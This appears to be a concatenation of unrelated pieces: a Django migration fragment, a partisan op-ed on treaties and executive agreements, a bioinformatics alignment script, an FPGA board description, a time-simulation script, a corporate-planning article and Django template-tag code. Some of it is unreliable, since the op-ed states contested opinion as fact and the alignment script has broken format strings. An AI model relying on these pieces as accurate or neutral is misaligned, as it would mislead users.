u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'july.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'location_members'", 'null': 'True', 'to': u"orm['people.Location']"}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'picture_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['people.Project']", 'null': 'True', 'blank': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'team_members'", 'null': 'True', 'to': u"orm['people.Team']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'people.achievedbadge': {
'Meta': {'object_name': 'AchievedBadge'},
'achieved_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'badge': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['people.Badge']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['july.User']", 'null': 'True', 'blank': 'True'})
},
u'people.badge': {
'Meta': {'object_name': 'Badge'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '2024', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
u'people.commit': {
'Meta': {'ordering': "['-timestamp']", 'object_name': 'Commit'},
'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'files': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '2024', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['people.Project']", 'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['july.User']", 'null': 'True', 'blank': 'True'})
},
u'people.language': {
'Meta': {'object_name': 'Language'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
u'people.location': {
'Meta': {'object_name': 'Location'},
'approved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
'total': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'people.project': {
'Meta': {'object_name': 'Project'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'forked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'forks': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'parent_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'repo_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'service': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'updated_on': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'watchers': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'people.team': {
'Meta': {'object_name': 'Team'},
'approved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
'total': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['people']
|
It is ironic that the contemporary discussion concerning American diplomacy should focus on the Paris Climate Accord. Students of history will appreciate that in 1778 that the first grand diplomatic debate of our country, the Treaty of Amity and Commerce, centered on France and is considered the first cornerstone treaty in American history.
It is important to hearken back to those initial debates because these ghosts haunt our decisions today. The American Congress was concerned about such a treaty, even in that desperate year of 1778 because they knew that America’s word had to be binding, and that future American foreign policy would henceforward be governed by any such treaty. It is not an accident of history that during the only two World Wars, the focus of American military policy was the defense and liberation of our oldest ally, France.
It is in this vein that we should reject President Obama’s penchant for actively subverting the treaty process and engaging in dangerous executive agreements that distort the constitutional requirements of Senate approval. This is not to reject altogether the use of executive agreements: Diplomacy is fluid and the expediency of any given time may require the president to utilize executive agreements to protect and promote American vital interests.
However, when such diplomacy is potentially multipresidential as is the case of the Iran deal (formally known as Joint Comprehensive Plan of Action, or JCPOA), or multigenerational as is the case with the Paris Climate Accords, then it is clear from any originalist argument that this is what the Founders wanted. Further, treaties create stability and credibility that no executive agreement can ever come near.
Although international relations between nations require both treaties and executive agreements, treaties signal the intent of longevity. They hold any single president and Congress accountable to the past whereby a prior Congress and president spent months, or years, debating the merits of binding American foreign policy down a specific path. They negate the vagaries of any given lapse of judgment and force the American government to do something it often does poorly — look at American interests from a long-term strategic objective. NATO, the Australia, New Zealand, United States Security Treaty, and the mutual security treaties with South Korea and Japan are all clear examples. These treaties, from Presidents Truman to Trump, continue to govern American foreign policy and have created the strongest alliance of western democracies in world history.
In contrast, Mr. Obama engaged in dangerous adventurism through executive decisions designed to subvert the authority of the Senate and the American people. If the Iran deal and the Paris Accords were as important as the previous administration claimed and were the lynchpin of the Obama diplomatic legacy, then why were they not crafted as treaties, sent to the Senate and by that action, allowed the constitutionally proper voice of the American people to be heard?
Concerning the Iran deal, former Secretary of State John Kerry stunned many when he admitted that the reason it was not submitted as a treaty was that the administration knew it would not pass. He also stated, “We’ve been clear from the beginning. We’re not negotiating a ‘legally binding plan.’ We’re negotiating a plan that will have in it a capacity for enforcement.” An administration known for its mental gymnastics receives another gold medal. It has been claimed that one of the reasons the Obama administration engaged in this was for expediency. The Obama administration cited a variety of treaties that the Senate has refused to ratify, notably the Law of the Sea Treaty and the Comprehensive Test Ban Treaty.
In both cases, it is highly questionable if these are advantageous to the United States. But here is the point: The Founders intended bad treaties to be defeated, and they intended that long-lasting diplomacy would be based on treaties and not fiat. Both the Paris Accords and the Iran deal should be required to pass the test for treaties: They commit multiple presidential administrations, they are multigenerational, and they will require America to be a credible partner, even if others are not. America has always rejected the full force of European realism. Every nation knows that if America commits, America keeps its word, but that commitment must be made in a procedurally and constitutionally sound manner.
All that the Obama administration achieved did not enhance American interests, but was a series of calculated moves to shore up the administration’s political base. The Obama administration knew full well that any executive agreement made by any president could be overturned by any future one. Now the situation has been muddied, in part because many of our allies do not fully understand American history, political culture or constitutional law. The United States specifically avoided ad hoc diplomacy during our formative years. Rather, it engaged in hard-nosed diplomacy and only made international agreements after much soul-searching and debate. Foreign policy’s No. 1 currency is credibility. Lose that, and it takes generations for it to return.
Debuting in Fall 2012, is an unparalleled publication written by one of the nation’s most fore-front political thinkers, Dr. Lamont C. Colucci, professor of political science, dynamic public speaker, Fulbright Scholar, and former diplomat with the U.S. Department of State. The National Security Doctrines of the American Presidency is a comprehensive two-volume analysis of foreign policy and national security doctrines as set by U.S. presidents from Washington to Obama.
|
#!/usr/bin/env python
"""Module to align and trim orthologs after the OrthoMCL step."""
from __future__ import division
from Bio import AlignIO
from shared import create_directory, extract_archive_of_files, create_archive_of_files, parse_options, \
CODON_TABLE_ID
from scatterplot import scatterplot
from versions import TRANSLATORX
from operator import itemgetter
from subprocess import check_call, STDOUT
import logging as log
import os
import shutil
import sys
import tempfile
__author__ = "Tim te Beek"
__copyright__ = "Copyright 2011, Netherlands Bioinformatics Centre"
__license__ = "MIT"
def _align_sicos(run_dir, sico_files):
"""Align all SICO files given as argument in parallel and return the resulting alignment files."""
log.info('Aligning {0} SICO genes using TranslatorX & muscle.'.format(len(sico_files)))
# We'll multiplex this embarrassingly parallel task using a pool of workers
return [_run_translatorx((run_dir, sico_file)) for sico_file in sico_files]
def _run_translatorx((run_dir, sico_file), translation_table=CODON_TABLE_ID):
"""Run TranslatorX to create DNA level alignment file of protein level aligned DNA sequences within sico_file."""
assert os.path.exists(TRANSLATORX) and os.access(TRANSLATORX, os.X_OK), 'Could not find or run ' + TRANSLATORX
# Determine output file name
sico_base = os.path.splitext(os.path.split(sico_file)[1])[0]
alignment_dir = create_directory('alignments/' + sico_base, inside_dir=run_dir)
# Created output file
file_base = os.path.join(alignment_dir, sico_base)
dna_alignment = file_base + '.nt_ali.fasta'
# Actually run the TranslatorX program
command = [TRANSLATORX,
'-i', sico_file,
'-c', str(translation_table),
'-o', file_base]
check_call(command, stdout=open('/dev/null', 'w'), stderr=STDOUT)
assert os.path.isfile(dna_alignment) and 0 < os.path.getsize(dna_alignment), \
'Alignment file should exist and have some content now: {0}'.format(dna_alignment)
return dna_alignment
def _trim_alignments(run_dir, dna_alignments, retained_threshold, max_indel_length, stats_file, scatterplot_file):
"""Trim all DNA alignments using _trim_alignment (singular), and calculate some statistics about the trimming."""
log.info('Trimming {0} DNA alignments from first non-gap codon to last non-gap codon'.format(len(dna_alignments)))
# Create directory here, to prevent race-condition when folder does not exist, but is then created by another process
trimmed_dir = create_directory('trimmed', inside_dir=run_dir)
# Trim all the alignments
trim_tpls = [_trim_alignment((trimmed_dir, dna_alignment, max_indel_length)) for dna_alignment in dna_alignments]
remaining_percts = [tpl[3] for tpl in trim_tpls]
trimmed_alignments = [tpl[0] for tpl in trim_tpls if retained_threshold <= tpl[3]]
misaligned = [tpl[0] for tpl in trim_tpls if retained_threshold > tpl[3]]
# Write trim statistics to file in such a way that they're easily converted to a graph in Galaxy
with open(stats_file, mode='w') as append_handle:
msg = '{0:6} sequence alignments trimmed'.format(len(trim_tpls))
log.info(msg)
append_handle.write('#' + msg + '\n')
average_retained = sum(remaining_percts) / len(remaining_percts)
msg = '{0:5.1f}% sequence retained on average overall'.format(average_retained)
log.info(msg)
append_handle.write('#' + msg + '\n')
filtered = len(misaligned)
msg = '{0:6} orthologs filtered because less than {1}% sequence retained or because of indel longer than {2} '\
.format(filtered, str(retained_threshold), max_indel_length)
log.info(msg)
append_handle.write('#' + msg + '\n')
append_handle.write('# Trimmed file\tOriginal length\tTrimmed length\tPercentage retained\n')
for tpl in sorted(trim_tpls, key=itemgetter(3)):
append_handle.write(os.path.split(tpl[0])[1] + '\t')
append_handle.write(str(tpl[1]) + '\t')
append_handle.write(str(tpl[2]) + '\t')
append_handle.write('{0:.2f}\n'.format(tpl[3]))
# Create scatterplot using trim_tuples
scatterplot(retained_threshold, trim_tpls, scatterplot_file)
return sorted(trimmed_alignments), sorted(misaligned)
def _trim_alignment((trimmed_dir, dna_alignment, max_indel_length)):
"""Trim alignment to retain first & last non-gapped codons across alignment, and everything in between (+gaps!).
Return trimmed file, original length, trimmed length and percentage retained as tuple"""
# Read single alignment from fasta file
alignment = AlignIO.read(dna_alignment, 'fasta')
# print '\n'.join([str(seqr.seq) for seqr in alignment])
# Total alignment should be just as long as first seqr of alignment
alignment_length = len(alignment[0])
# After using protein alignment only for CDS, all alignment lengths should be multiples of three
assert alignment_length % 3 == 0, 'Length not a multiple of three: {} \n{2}'.format(alignment_length, alignment)
# Assert all codons are either full length codons or gaps, but not a mix of gaps and letters such as AA- or A--
for index in range(0, alignment_length, 3):
for ali in alignment:
codon = ali.seq[index:index + 3]
assert not ('-' in codon and str(codon) != '---'), '{0} at {1} in \n{2}'.format(codon, index, alignment)
# Loop over alignment, taking 3 DNA characters each time, representing a single codon
first_full_codon_start = None
last_full_codon_end = None
for index in range(0, alignment_length, 3):
codon_concatemer = ''.join([str(seqr.seq) for seqr in alignment[:, index:index + 3]])
if '-' in codon_concatemer:
continue
if first_full_codon_start is None:
first_full_codon_start = index
else:
last_full_codon_end = index + 3
# Create sub alignment consisting of all trimmed sequences from full alignment
trimmed = alignment[:, first_full_codon_start:last_full_codon_end]
trimmed_length = len(trimmed[0])
assert trimmed_length % 3 == 0, 'Length not a multiple of three: {} \n{2}'.format(trimmed_length, trimmed)
# Write out trimmed alignment file
trimmed_file = os.path.join(trimmed_dir, os.path.split(dna_alignment)[1])
with open(trimmed_file, mode='w') as write_handle:
AlignIO.write(trimmed, write_handle, 'fasta')
# Assert file now exists with content
assert os.path.isfile(trimmed_file) and os.path.getsize(trimmed_file), \
'Expected trimmed alignment file to exist with some content now: {0}'.format(trimmed_file)
# Filter out those alignment that contain an indel longer than N: return zero (0) as trimmed length & % retained
if any('-' * max_indel_length in str(seqr.seq) for seqr in trimmed):
return trimmed_file, alignment_length, 0, 0
return trimmed_file, alignment_length, trimmed_length, trimmed_length / alignment_length * 100
def main(args):
"""Main function called when run from command line or as part of pipeline."""
usage = """
Usage: filter_orthologs.py
--orthologs-zip=FILE archive of orthologous genes in FASTA format
--retained-threshold=PERC filter orthologs that retain less than PERC % of sequence after trimming alignment
--max-indel-length=NUMBER filter orthologs that contain insertions / deletions longer than N in middle of alignment
--aligned-zip=FILE destination file path for archive of aligned orthologous genes
--misaligned-zip=FILE destination file path for archive of misaligned orthologous genes
--trimmed-zip=FILE destination file path for archive of aligned & trimmed orthologous genes
--stats=FILE destination file path for ortholog trimming statistics file
--scatterplot=FILE destination file path for scatterplot of retained and filtered sequences by length
"""
options = ['orthologs-zip', 'retained-threshold', 'max-indel-length',
'aligned-zip', 'misaligned-zip', 'trimmed-zip', 'stats', 'scatterplot']
orthologs_zip, retained_threshold, max_indel_length, \
aligned_zip, misaligned_zip, trimmed_zip, target_stats_path, target_scatterplot = \
parse_options(usage, options, args)
# Convert retained threshold to integer, so we can fail fast if argument value format was wrong
retained_threshold = int(retained_threshold)
max_indel_length = int(max_indel_length)
# Run filtering in a temporary folder, to prevent interference from simultaneous runs
run_dir = tempfile.mkdtemp(prefix='align_trim_')
# Extract files from zip archive
temp_dir = create_directory('orthologs', inside_dir=run_dir)
sico_files = extract_archive_of_files(orthologs_zip, temp_dir)
# Align SICOs so all sequences become equal length sequences
aligned_files = _align_sicos(run_dir, sico_files)
# Filter orthologs that retain less than PERC % of sequence after trimming alignment
trimmed_files, misaligned_files = _trim_alignments(run_dir, aligned_files, retained_threshold, max_indel_length,
target_stats_path, target_scatterplot)
# Create archives of files on command line specified output paths
create_archive_of_files(aligned_zip, aligned_files)
create_archive_of_files(misaligned_zip, misaligned_files)
create_archive_of_files(trimmed_zip, trimmed_files)
# Remove unused files to free disk space
shutil.rmtree(run_dir)
# Exit after a comforting log message
log.info('Produced: \n%s', '\n'.join((aligned_zip, misaligned_zip, trimmed_zip,
target_stats_path, target_scatterplot)))
if __name__ == '__main__':
main(sys.argv[1:])
|
Based on Altera’s Stratix IV GX FPGA, BittWare’s 4S-XMC (4SXM) is a single-width XMC, designed to provide powerful FPGA processing and high-speed serial I/O capabilities to VME, VXS, VPX, cPCI, AdvancedTCA, or PCI Express carrier boards. The 4SXM features a high-density, low-power Altera Stratix IV GX FPGA, which was designed specifically for serial I/O-based applications and is PCI SIG compliant for PCI Express Gen1 and Gen2. Four small form-factor pluggable (SFP) compact optical transceivers are available on the front panel. Eight multi-gigabit serial lanes supporting PCI Express, Serial RapidIO, and 10 GigE are available via the board’s rear panel as well as 44 general purpose digital I/O signals. The 4SXM also provides QDRII+ and Flash.
The 4SXM provides four SFP transceivers on the front panel with each transceiver providing support for virtually any serial communication standard, including: Fibre Channel, Gigabit Ethernet, SONET, CPRI, and OBSAI. The four SFP SerDes channels are connected directly to the Stratix IV GX FPGA. A 28-bit SFP control bus is also available to the Stratix IV GX.
The Altera Stratix IV GX was specifically designed for serial I/O-based applications requiring high-density, reconfigurable logic. The Stratix IV GX provides full-duplex, multi-gigabit transceivers, supporting PCI Express (Rev 1.0/2.0), 10 GigE, GigE, Serial RapidIO (Rev 1.0/2.0), and SerialLite II standards, as well as many others.
The 4SXM is compatible with BittWare’s GTV6 or any other standard VME, VXS, VPX, CompactPCI, AdvancedTCA, or PCI Express carrier board equipped with an XMC interface. The board complies with the VITA 42.0 XMC standard, the VITA 42.2 Serial RapidIO standard, and the VITA 42.3 XMC PCI Express Protocol standard. The primary XMC connector (J15) provides 8 SerDes lanes directly to the Stratix IV GX, while XMC J14 provides 44 general-purpose digital I/O signals to the FPGA.
Three reference oscillators are available on the 4SXM. The standard set includes 106.25 MHz for Fibre Channel, 100 MHz for PCI Express, and 156.25 MHz for Serial RapidIO or 10 GigE.
|
#our unit of time here, is going to be
#one minute, and we're going to run for one week
SIM_TIME=7*24*60
DOW=["Sun","Mon","Tue","Wed","Thu","Fri","Sat"]
hour_array=["00","01", "02", "03", "04", "05", "06",
"07","08", "09", "10", "11", "12", "13",
"14","15", "16", "17", "18", "19", "20",
"21","22", "23"]
current_day_hour_minute=None
class DayHourMinute(object):
def __init__(self, day_string, hour_string, minute_string):
self.day=day_string
self.hour=hour_string
self.minute=minute_string
class ScheduleHour(object):
def __init__(self, day, hour, index):
self.day = day
self.hour = hour
self.index = index
####START SIM RUN
hour=0
schedule = []
h=0
for this_day in DOW:
for this_hour in hour_array:
temp_hour = ScheduleHour(this_day, this_hour, h)
schedule.append(temp_hour)
h += 1
for i in range(1, SIM_TIME):
if i % 60 == 0:
print("Another hour has passed. Last hour %d" % hour)
hour+=1
print("This hour: %d" % hour)
day_index = DOW.index(schedule[hour].day)
current_day_hour_minute = DayHourMinute(schedule[hour].day,
schedule[hour].hour, str(i - int(schedule[hour].hour) * 60
- (1440 * day_index)))
print("Day %s Hour %s Minute %s " % (current_day_hour_minute.day,
current_day_hour_minute.hour,
current_day_hour_minute.minute))
|
Corporate planning is creating a strategy for meeting business goals and improving your business. A corporate plan is a roadmap that lays out your business’s plan of action. It is imperative to write down goals and plan for how they will be achieved. Without planning, business operations can be haphazard, and employees are rarely on the same page. When you focus on corporate planning, you set achievable goals and bring your business one step closer to success.
Vision statement: You company’s vision statement broadly defines what goals you are working to achieve. This statement is where you hone in on your business’s focus and what you want to accomplish over the next three-to-five years. Think big, but remember that you will have to create a strategic plan to back these goals up. So always make sure that your goals can be defined as SMART goals (strategic, measurable, achievable, realistic and time-based).
Mission statement: A good mission statement lays out how you will achieve your vision statement in a few sentences. It should illustrate what you plan to offer or sell, the market you are in, and what makes your company unique. A mission statement is like an elevator pitch for your entire strategy. It effectively communicates who you are and what you want to do in a few lines.
Resources and scope: Part of corporate planning is taking stock of everything you currently have going on in your organization. You'll look at your systems, products, employees, assets, programs, divisions, accounting, finance and anything else that is critical to meeting your vision. This part is almost like making a map of your current organization. It gives you a bird’s eye view of everything your company has going on, which helps you create a plan for moving towards the future.
Strategies: Now, it’s time to illustrate the strategies you plan to use to meet the objectives of your company. These strategies could be anything from introducing new products to reducing labor costs by 25 percent, depending on the goal. Your strategies should directly address the objectives you have laid out in your corporate plan, and include a plan of action for how you will implement them. These are the nitty-gritty plan details.
The needs of your corporate planning will vary depending on your business and industry. For example, for automotive giant GM, CEO Mary Barra’s corporate turnaround strategy included several objectives. The main ones included becoming a leader in product and technology, growing the Cadillac brand, continuing to grow the GM brand in China, continuing to improve GM’s finances and becoming more efficient from an operational standpoint. These objectives are, of course, tailored to GM’s specific needs as a company.
Financial objectives: Presumably, you went into business to make money. Your corporate planning financial objectives are your money-oriented goals. These objectives can include growing shareholder value, increasing profits and generating more revenue, to name a few. However, not all financial objectives are about revenue and profits. There are also objectives on cutting costs, balancing budgets, maintaining proper budget ratios and more. Another financial objective example might be diversifying or creating new revenue streams. Your specific goals will depend on your company’s individual needs, but most corporate plans include at least a few financial objectives.
Customer objectives: Your customer objectives center on what you plan to do for your customers. A customer-centered objective could be giving your consumers the best value for the price they pay. Or, you could aim to improve product reliability. Another customer objective is increasing your market share or offering the best possible customer service. These objectives will vary, but they all center around meeting customer demand.
Internal objectives: It’s important to consider internal objectives when doing corporate planning. Internal objectives include three areas: innovation, operations and customer service. Innovation objectives might consist of improving a product or growing the percentage of sales of a particular product. Another innovation objective might be to invest x dollars in the innovation of products. Operations objectives focus on reducing waste, investing in quality, improving workplace safety and reducing errors in manufacturing, to name a few. Another potential operations objective is streamlining. Finally, customer service objectives center on improving customer service, retention and satisfaction.
Learning and growth objectives: Every organization needs learning and growth objectives when corporate planning. Learning and growth objectives are those that involve employees, your company culture and your business’s organizational capacity. One possible example of a learning and growth objective is boosting company culture, increasing employee retention and improving productivity.
Every business needs to do corporate planning. Creating a strategic plan gives your company direction and actionable goals to see through. Without a plan, how will you know your priorities or where to place your resources? A business with a plan achieves better results than one that does not have any direction.
Another reason you need corporate planning is because it can help align your organization and its values. A corporate plan does more than simply keep your employees on a timeline for success. It also defines who you are as a company, and what you stand for. Likewise, when employees get a say in the direction of a business and its objectives, your company culture will improve. Planning for the future brings everyone to the table, promotes the exchange of ideas and creates effective solutions to organizational problems. Making and sticking to a plan ensures that everyone in the organization is on the same page. Small business owners especially will find that strategic planning is a great way to get feedback from employees and improve overall culture.
Finally, a corporate plan helps communicate your brand’s message to employees, shareholders, creditors, partners, investors and customers. Taking the time to hone your vision and mission statements is extremely important for messaging, which is essentially communicating what you are and what you want to be as a company. When your purpose as a company is boiled down to its bare bones and made widely available, the message sticks. Everyone immediately knows what your brand stands for and who it hopes to serve. A solid, clear corporate plan can be used to attract investors, customers and employees.
There are no hard-and-fast rules for how to do corporate planning. Each company has unique needs when it comes to planning for the future. However, there are a few tips to keep in mind for corporate planning success. First, gather input from employees from all different divisions of the company to go into the plan. You can do this through an open forum or employee meetings.
Next, a crucially important step is to bring the right people together to write the plan. Even if you involve many people in the brainstorming process, only a few should be involved in the actual writing process. Wording can become arduous when too many people are involved. For the first draft of the plan, it’s important not to obsess over every word. That will come later as you revise drafts and bring in more players, such as your board members. At first, only concern yourself with getting the main ideas and objectives written down.
Executive summary: This is the quick version of what your corporate plan includes. An executive summary should concisely cover your brand values, mission, vision, objectives and key strategies.
Signature page: This page will include board member signatures, stating that they agree with and are committed to your goals and vision.
Company description: Include your company’s biography, including its history, products and any significant achievements.
Mission, vision and value statements: These statements outline who your company is, what you do and where you plan to go in the future. This is where you communicate your most important priorities.
Strategic analysis of your company: This is the section that covers a SWOT analysis (strengths, weaknesses, opportunities, threats) of your company and its divisions. The strategic analysis also lays out issues you plan to address in the coming months and years.
Strategies and tactics: In this section, lay out your strategies and how exactly you plan to accomplish them.
Action plan: Your action plan lays out the responsibilities you plan to take on, as well as a timeline for accomplishing them.
Budget and operations plans: Of course, to accomplish your company’s goals, you will need to have money in the budget. Lay out the financials and your specific plan for operations.
Monitoring and evaluation: How do you plan to evaluate if your goals are being met? This section illustrates how you will measure progress for your objectives.
Communication of the plan: A description of how you will communicate your corporate plan to employees, stakeholders, customers and any other important parties.
|
"""Default tags used by the template system, available to all templates."""
import sys
import re
from itertools import cycle as itertools_cycle
try:
reversed
except NameError:
from django.utils.itercompat import reversed # Python 2.3 fallback
from django.template import Node, NodeList, Template, Context, Variable
from django.template import TemplateSyntaxError, VariableDoesNotExist, BLOCK_TAG_START, BLOCK_TAG_END, VARIABLE_TAG_START, VARIABLE_TAG_END, SINGLE_BRACE_START, SINGLE_BRACE_END, COMMENT_TAG_START, COMMENT_TAG_END
from django.template import get_library, Library, InvalidTemplateLibrary
from django.conf import settings
from django.utils.encoding import smart_str, smart_unicode
from django.utils.itercompat import groupby
from django.utils.safestring import mark_safe
register = Library()
class AutoEscapeControlNode(Node):
"""Implements the actions of the autoescape tag."""
def __init__(self, setting, nodelist):
self.setting, self.nodelist = setting, nodelist
def render(self, context):
old_setting = context.autoescape
context.autoescape = self.setting
output = self.nodelist.render(context)
context.autoescape = old_setting
if self.setting:
return mark_safe(output)
else:
return output
class CommentNode(Node):
def render(self, context):
return ''
class CycleNode(Node):
def __init__(self, cyclevars, variable_name=None):
self.cycle_iter = itertools_cycle([Variable(v) for v in cyclevars])
self.variable_name = variable_name
def render(self, context):
value = self.cycle_iter.next().resolve(context)
if self.variable_name:
context[self.variable_name] = value
return value
class DebugNode(Node):
def render(self, context):
from pprint import pformat
output = [pformat(val) for val in context]
output.append('\n\n')
output.append(pformat(sys.modules))
return ''.join(output)
class FilterNode(Node):
def __init__(self, filter_expr, nodelist):
self.filter_expr, self.nodelist = filter_expr, nodelist
def render(self, context):
output = self.nodelist.render(context)
# Apply filters.
context.update({'var': output})
filtered = self.filter_expr.resolve(context)
context.pop()
return filtered
class FirstOfNode(Node):
def __init__(self, vars):
self.vars = map(Variable, vars)
def render(self, context):
for var in self.vars:
try:
value = var.resolve(context)
except VariableDoesNotExist:
continue
if value:
return smart_unicode(value)
return u''
class ForNode(Node):
def __init__(self, loopvars, sequence, is_reversed, nodelist_loop):
self.loopvars, self.sequence = loopvars, sequence
self.is_reversed = is_reversed
self.nodelist_loop = nodelist_loop
def __repr__(self):
reversed_text = self.is_reversed and ' reversed' or ''
return "<For Node: for %s in %s, tail_len: %d%s>" % \
(', '.join(self.loopvars), self.sequence, len(self.nodelist_loop),
reversed_text)
def __iter__(self):
for node in self.nodelist_loop:
yield node
def get_nodes_by_type(self, nodetype):
nodes = []
if isinstance(self, nodetype):
nodes.append(self)
nodes.extend(self.nodelist_loop.get_nodes_by_type(nodetype))
return nodes
def render(self, context):
nodelist = NodeList()
if 'forloop' in context:
parentloop = context['forloop']
else:
parentloop = {}
context.push()
try:
values = self.sequence.resolve(context, True)
except VariableDoesNotExist:
values = []
if values is None:
values = []
if not hasattr(values, '__len__'):
values = list(values)
len_values = len(values)
if self.is_reversed:
values = reversed(values)
unpack = len(self.loopvars) > 1
# Create a forloop value in the context. We'll update counters on each
# iteration just below.
loop_dict = context['forloop'] = {'parentloop': parentloop}
for i, item in enumerate(values):
# Shortcuts for current loop iteration number.
loop_dict['counter0'] = i
loop_dict['counter'] = i+1
# Reverse counter iteration numbers.
loop_dict['revcounter'] = len_values - i
loop_dict['revcounter0'] = len_values - i - 1
# Boolean values designating first and last times through loop.
loop_dict['first'] = (i == 0)
loop_dict['last'] = (i == len_values - 1)
if unpack:
# If there are multiple loop variables, unpack the item into
# them.
context.update(dict(zip(self.loopvars, item)))
else:
context[self.loopvars[0]] = item
for node in self.nodelist_loop:
nodelist.append(node.render(context))
if unpack:
# The loop variables were pushed on to the context so pop them
# off again. This is necessary because the tag lets the length
# of loopvars differ to the length of each set of items and we
# don't want to leave any vars from the previous loop on the
# context.
context.pop()
context.pop()
return nodelist.render(context)
class IfChangedNode(Node):
def __init__(self, nodelist_true, nodelist_false, *varlist):
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self._last_seen = None
self._varlist = map(Variable, varlist)
self._id = str(id(self))
def render(self, context):
if 'forloop' in context and self._id not in context['forloop']:
self._last_seen = None
context['forloop'][self._id] = 1
try:
if self._varlist:
# Consider multiple parameters. This automatically behaves
# like an OR evaluation of the multiple variables.
compare_to = [var.resolve(context) for var in self._varlist]
else:
compare_to = self.nodelist_true.render(context)
except VariableDoesNotExist:
compare_to = None
if compare_to != self._last_seen:
firstloop = (self._last_seen == None)
self._last_seen = compare_to
context.push()
context['ifchanged'] = {'firstloop': firstloop}
content = self.nodelist_true.render(context)
context.pop()
return content
elif self.nodelist_false:
return self.nodelist_false.render(context)
